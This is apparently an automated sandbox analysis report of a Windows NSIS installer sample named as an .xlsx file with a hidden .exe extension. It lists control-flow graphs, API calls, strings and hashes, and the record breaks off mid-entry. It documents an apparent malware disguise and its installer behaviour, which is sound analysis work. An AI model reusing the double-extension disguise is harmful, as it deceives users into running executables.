calls 4296->4302 4304 40544c 4297->4304 4305 40543e SendMessageW 4297->4305 4298->4297 4299->4301 4306 4055c0 CreatePopupMenu 4299->4306 4300->4287 4302->4295 4303->4289 4308 40419a 19 API calls 4304->4308 4305->4304 4307 405f6a 18 API calls 4306->4307 4309 4055d0 AppendMenuW 4307->4309 4310 40545c 4308->4310 4311 405600 TrackPopupMenu 4309->4311 4312 4055ed GetWindowRect 4309->4312 4313 405465 ShowWindow 4310->4313 4314 405499 GetDlgItem SendMessageW 4310->4314 4311->4301 4316 40561b 4311->4316 4312->4311 4317 405488 4313->4317 4318 40547b ShowWindow 4313->4318 4314->4301 4315 4054c0 SendMessageW SendMessageW 4314->4315 4315->4301 4319 405637 SendMessageW 4316->4319 4325 4041cf SendMessageW 4317->4325 4318->4317 4319->4319 4321 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4319->4321 4322 405679 SendMessageW 4321->4322 4322->4322 4323 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4322->4323 4323->4301 4324->4283 4325->4314 4326->4284 4328 4041e6 SendMessageW 4327->4328 4329 4052e8 4328->4329 4332 401389 2 API calls 4329->4332 4333 40530f 4329->4333 4330 4041e6 SendMessageW 4331 405321 OleUninitialize 4330->4331 4332->4329 4333->4330 5530 402331 5531 402337 5530->5531 5532 402b3a 18 API calls 5531->5532 5533 402349 5532->5533 5534 402b3a 18 API calls 5533->5534 5535 402353 RegCreateKeyExW 5534->5535 5536 40237d 5535->5536 5538 402793 5535->5538 5537 402398 5536->5537 5539 402b3a 18 API calls 5536->5539 5540 402b1d 18 API calls 5537->5540 5543 4023a4 5537->5543 5542 40238e lstrlenW 5539->5542 5540->5543 5541 4023bf RegSetValueExW 5545 4023d5 RegCloseKey 5541->5545 5542->5537 5543->5541 5544 403062 46 API calls 5543->5544 5544->5541 5545->5538 5547 404635 5548 404661 5547->5548 5549 404672 5547->5549 5608 405708 GetDlgItemTextW 5548->5608 5550 40467e GetDlgItem 5549->5550 5557 4046dd 5549->5557 5552 404692 5550->5552 5556 4046a6 SetWindowTextW 5552->5556 5560 405a3e 4 API calls 5552->5560 5553 4047c1 5606 404955 5553->5606 5610 405708 GetDlgItemTextW 5553->5610 5554 40466c 5555 4061dc 5 API calls 5554->5555 5555->5549 5561 40419a 19 API calls 5556->5561 5557->5553 5562 405f6a 18 API calls 5557->5562 5557->5606 5559 404201 8 API calls 5564 404969 5559->5564 5565 40469c 5560->5565 5566 4046c2 5561->5566 5567 404751 SHBrowseForFolderW 5562->5567 5563 4047f1 5568 405a9b 18 API calls 5563->5568 5565->5556 5572 405993 3 API calls 5565->5572 5569 40419a 19 API calls 5566->5569 5567->5553 5570 404769 CoTaskMemFree 5567->5570 5571 4047f7 5568->5571 5573 4046d0 5569->5573 5574 405993 3 API calls 5570->5574 5611 405f48 lstrcpynW 5571->5611 5572->5556 5609 4041cf SendMessageW 5573->5609 5577 404776 5574->5577 5579 4047ad SetDlgItemTextW 5577->5579 5583 405f6a 18 API calls 5577->5583 5578 4046d6 5581 4062b2 3 API calls 5578->5581 5579->5553 5580 40480e 5582 4062b2 3 API calls 5580->5582 5581->5557 5590 404816 5582->5590 5584 404795 lstrcmpiW 5583->5584 5584->5579 5586 4047a6 lstrcatW 5584->5586 5585 404855 5612 405f48 lstrcpynW 5585->5612 5586->5579 5588 40485c 5589 405a3e 4 API calls 5588->5589 5591 404862 GetDiskFreeSpaceW 5589->5591 5590->5585 5594 4059df 2 API calls 5590->5594 5595 4048a7 5590->5595 5593 404885 MulDiv 5591->5593 5591->5595 5593->5595 5594->5590 5596 4049d6 21 API calls 5595->5596 5605 404904 5595->5605 5597 4048f6 5596->5597 5600 404906 SetDlgItemTextW 5597->5600 5601 4048fb 5597->5601 5598 40140b 2 API calls 5599 404927 5598->5599 5613 4041bc KiUserCallbackDispatcher 5599->5613 5600->5605 5603 4049d6 21 API calls 5601->5603 5603->5605 5604 404943 5604->5606 5614 4045ca 5604->5614 5605->5598 5605->5599 5606->5559 5608->5554 5609->5578 5610->5563 5611->5580 5612->5588 5613->5604 5615 4045d8 5614->5615 5616 4045dd SendMessageW 5614->5616 5615->5616 5616->5606 5617 4028b6 5618 402b1d 18 API calls 5617->5618 5619 4028bc 5618->5619 5620 4028f8 5619->5620 5621 4028df 5619->5621 5625 402793 5619->5625 5622 402902 5620->5622 5623 40290e 5620->5623 5624 4028e4 5621->5624 5630 4028f5 5621->5630 5626 402b1d 18 API calls 5622->5626 5627 405f6a 18 API calls 5623->5627 5631 405f48 lstrcpynW 5624->5631 5626->5630 5627->5630 5630->5625 5632 405e8f wsprintfW 5630->5632 5631->5625 5632->5625 5633 404337 5634 40434f 5633->5634 5640 404469 5633->5640 5641 40419a 19 API calls 5634->5641 5635 4044d3 5636 4045a5 5635->5636 5637 4044dd GetDlgItem 5635->5637 5643 404201 8 API calls 5636->5643 5638 404566 5637->5638 5639 4044f7 5637->5639 5638->5636 5648 404578 5638->5648 5639->5638 5647 40451d 6 API calls 5639->5647 5640->5635 5640->5636 5644 4044a4 GetDlgItem SendMessageW 5640->5644 5642 4043b6 5641->5642 5645 40419a 19 API calls 5642->5645 5646 4045a0 5643->5646 5664 4041bc KiUserCallbackDispatcher 5644->5664 5650 4043c3 CheckDlgButton 5645->5650 5647->5638 5651 40458e 5648->5651 5652 40457e SendMessageW 5648->5652 5662 4041bc KiUserCallbackDispatcher 5650->5662 5651->5646 5656 404594 SendMessageW 5651->5656 5652->5651 5653 4044ce 5654 4045ca SendMessageW 5653->5654 5654->5635 5656->5646 5657 4043e1 GetDlgItem 5663 4041cf SendMessageW 5657->5663 5659 4043f7 SendMessageW 5660 404414 GetSysColor 5659->5660 5661 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5659->5661 5660->5661 5661->5646 5662->5657 5663->5659 5664->5653 5665 4014b8 5666 4014be 5665->5666 5667 401389 2 API calls 5666->5667 5668 4014c6 5667->5668 4691 4015b9 4692 402b3a 18 API calls 4691->4692 4693 4015c0 4692->4693 4694 405a3e 4 API calls 4693->4694 4705 4015c9 4694->4705 4695 401614 4696 401646 4695->4696 4697 401619 4695->4697 4702 401423 25 API calls 4696->4702 4699 401423 25 API calls 4697->4699 4698 4059c0 CharNextW 4700 4015d7 CreateDirectoryW 4698->4700 4701 401620 4699->4701 4703 4015ed GetLastError 4700->4703 4700->4705 4709 405f48 lstrcpynW 4701->4709 4708 40163e 4702->4708 4703->4705 4706 4015fa GetFileAttributesW 4703->4706 4705->4695 4705->4698 4706->4705 4707 40162d SetCurrentDirectoryW 4707->4708 4709->4707 5669 401939 5670 402b3a 18 API calls 5669->5670 5671 401940 lstrlenW 5670->5671 5672 4024e8 5671->5672 5673 40293b 5674 402b1d 18 API calls 5673->5674 5675 402941 5674->5675 5676 402974 5675->5676 5677 402793 5675->5677 5679 40294f 5675->5679 5676->5677 5678 405f6a 18 API calls 5676->5678 5678->5677 5679->5677 5681 405e8f wsprintfW 5679->5681 5681->5677 5682 40683c 5684 406421 5682->5684 5683 406d8c 5684->5683 5685 4064a2 GlobalFree 5684->5685 5686 4064ab GlobalAlloc 5684->5686 5687 406522 GlobalAlloc 5684->5687 5688 406519 GlobalFree 5684->5688 5685->5686 5686->5683 5686->5684 5687->5683 5687->5684 5688->5687 4925 40173f 4926 402b3a 18 API calls 4925->4926 4927 401746 4926->4927 4928 405be3 2 API calls 4927->4928 4929 40174d 4928->4929 4930 405be3 2 API calls 4929->4930 4930->4929 5689 10002a7f 5690 10002a97 5689->5690 5691 1000158f 2 API calls 5690->5691 5692 10002ab2 5691->5692

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 17 403432-403436 14->17 18 40342c-403431 14->18 15->14 15->15 26 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->26 27 40359c-4035b6 DeleteFileW call 402dbc 16->27 20 4034f7-403506 call 4059c0 17->20 21 40343c-403442 17->21 18->17 20->11 38 403508-403509 20->38 24 403444-40344b 21->24 25 40345c-403495 21->25 31 403452 24->31 32 40344d-403450 24->32 33 4034b2-4034ec 25->33 34 403497-40349c 25->34 26->27 41 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 26->41 43 403667-403676 call 40382d OleUninitialize 27->43 44 4035bc-4035c2 27->44 31->25 32->25 32->31 36 4034f4-4034f6 33->36 37 4034ee-4034f2 33->37 34->33 40 40349e-4034a6 34->40 36->20 37->36 42 403518-403525 call 405f48 37->42 38->11 45 4034a8-4034ab 40->45 46 4034ad 40->46 41->27 41->43 42->16 56 403772-403778 43->56 57 40367c-40368c call 405724 ExitProcess 43->57 48 403657-40365e call 40391f 44->48 49 4035c8-4035d3 call 4059c0 44->49 45->33 45->46 46->33 59 403663 48->59 63 403621-40362b 49->63 64 4035d5-40360a 49->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->43 68 403823-403827 ExitProcess 61->68 69 40381f 61->69 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 66 403692-4036ac lstrcatW lstrcmpiW 63->66 67 40362d-40363b call 405a9b 63->67 71 40360c-403610 64->71 66->43 73 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 66->73 67->43 82 40363d-403653 call 405f48 * 2 67->82 69->68 75 403612-403617 71->75 76 403619-40361d 71->76 79 4036d1-4036fa call 405f48 73->79 80 4036c6-4036cc call 405f48 73->80 75->76 77 40361f 75->77 76->71 76->77 77->63 91 4036ff-40371b call 405f6a DeleteFileW 79->91 80->79 82->48 102 40375c-403764 91->102 103 40371d-40372d CopyFileW 91->103 105 403801-40380c ExitWindowsEx 92->105 106 4037f5-4037ff 92->106 93->92 96 4037a1-4037a3 93->96 96->92 100 4037a5-4037b7 GetCurrentProcess 96->100 100->92 115 4037b9-4037db 100->115 102->91 104 403766-40376d call 405de2 102->104 103->102 107 40372f-40374f call 405de2 call 405f6a call 4056c3 103->107 104->43 105->61 108 40380e-403810 call 40140b 105->108 106->105 106->108 107->102 122 403751-403758 CloseHandle 107->122 108->61 115->92 122->102
                                                                            APIs
                                                                            • #17.COMCTL32 ref: 00403379
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                              • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                                              • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                                              • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                            • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                                              • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                            • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000), ref: 004033DB
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",?), ref: 00403403
                                                                            • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                                            • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                                            • OleUninitialize.OLE32(?), ref: 0040366C
                                                                            • ExitProcess.KERNEL32 ref: 0040368C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 00403698
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 004036A4
                                                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                                            • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,0041FEA8,00000001), ref: 00403725
                                                                            • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                            • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                            • ExitProcess.KERNEL32 ref: 00403827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                            • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                            • API String ID: 4107622049-916649053
                                                                            • Opcode ID: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                                            • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                                            • Opcode Fuzzy Hash: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                                            • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 145 405439-40543c 124->145 146 40541d-405437 SendMessageW * 2 124->146 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 149 40556c-405570 134->149 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 147 4055a7-4055ba SendMessageW 138->147 143 405593-405594 call 404173 140->143 144 405585-40558e call 4051f2 140->144 141->134 143->136 144->143 152 40544c-405463 call 40419a 145->152 153 40543e-40544a SendMessageW 145->153 146->145 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 147->154 155 4056bc-4056be 147->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->149 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 168 405637-405652 SendMessageW 165->168 169 40548e-405494 call 4041cf 166->169 167->169 168->168 171 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->171 169->163 172 405679-4056a0 SendMessageW 171->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                                            • GetClientRect.USER32(?,?), ref: 004053DC
                                                                            • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                                            • ShowWindow.USER32(?,?), ref: 00405480
                                                                            • GetDlgItem.USER32(?,?), ref: 004054A1
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                                            • GetDlgItem.USER32(?,?), ref: 004053AE
                                                                              • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                            • GetDlgItem.USER32(?,?), ref: 004054F3
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                                            • ShowWindow.USER32(00000000), ref: 0040552C
                                                                            • ShowWindow.USER32(?,?), ref: 00405531
                                                                            • ShowWindow.USER32(?), ref: 0040557B
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                                            • CreatePopupMenu.USER32 ref: 004055C0
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                                            • GetWindowRect.USER32(?,?), ref: 004055F4
                                                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                            • OpenClipboard.USER32(00000000), ref: 00405655
                                                                            • EmptyClipboard.USER32 ref: 0040565B
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                                            • CloseClipboard.USER32 ref: 004056B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: 4Ct${$&B
                                                                            • API String ID: 590372296-1569179724
                                                                            • Opcode ID: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                                            • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                                            • Opcode Fuzzy Hash: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                                            • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 426 405fb7-405fbe 422->426 424 4061c2-4061cd 423->424 425 405fc3-405fd0 423->425 428 4061d8-4061d9 424->428 429 4061cf-4061d3 call 405f48 424->429 425->424 427 405fd6-405fe2 425->427 426->423 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 441 40603d-406041 437->441 444 406056-40605d 438->444 442 406150-40615c call 405e8f 439->442 443 40615e-40616b call 405f48 439->443 445 406190-4061a1 lstrlenW 440->445 446 406183-40618b call 405f6a 440->446 441->438 448 406043-406047 441->448 457 406170-406179 442->457 443->457 450 406062-406064 444->450 451 40605f-406061 444->451 445->423 446->445 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->444 458 4060b3-4060b6 455->458 459 4060a5-4060b1 GetSystemDirectoryW 455->459 465 406088-40608c 456->465 457->445 461 40617b 457->461 463 406121-406123 458->463 464 4060b8-4060c6 GetWindowsDirectoryW 458->464 462 406125-406129 459->462 466 40613c-406142 call 4061dc 461->466 462->466 467 40612b-40612f 462->467 463->462 469 4060c8-4060d2 463->469 464->463 465->467 470 406092-40609b call 405f6a 465->470 466->445 467->466 472 406131-406137 lstrcatW 467->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 470->462 472->466 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->462 478->479 479->463 480->462 480->475
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                                            • GetSystemDirectoryW.KERNEL32(Call,?), ref: 004060AB
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,?), ref: 004060BE
                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                                            • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                                            • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 900638850-878914946
                                                                            • Opcode ID: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                                            • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                            • Opcode Fuzzy Hash: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                                            • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 486 40598c-405990 484->486 487 405818-40581a 485->487 488 405829-405839 call 405f48 485->488 489 405820-405823 487->489 490 40593a-40593f 487->490 494 405848-405849 call 4059df 488->494 495 40583b-405846 lstrcatW 488->495 489->488 489->490 490->486 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->486 497->486 504 405958-40596c call 405993 call 405788 497->504 502 405854-40585c 498->502 503 40585e-405864 lstrcatW 498->503 502->503 505 405869-405885 lstrlenW FindFirstFileW 502->505 503->505 521 405984-405987 call 4051f2 504->521 522 40596e-405971 504->522 506 40588b-405893 505->506 507 40592f-405933 505->507 509 4058b3-4058c7 call 405f48 506->509 510 405895-40589d 506->510 507->490 512 405935 507->512 523 4058c9-4058d1 509->523 524 4058de-4058e9 call 405788 509->524 513 405912-405922 FindNextFileW 510->513 514 40589f-4058a7 510->514 512->490 513->506 520 405928-405929 FindClose 513->520 514->509 517 4058a9-4058b1 514->517 517->509 517->513 520->507 521->486 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->513 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->486 526->513 534->513 538 4058f0-405900 call 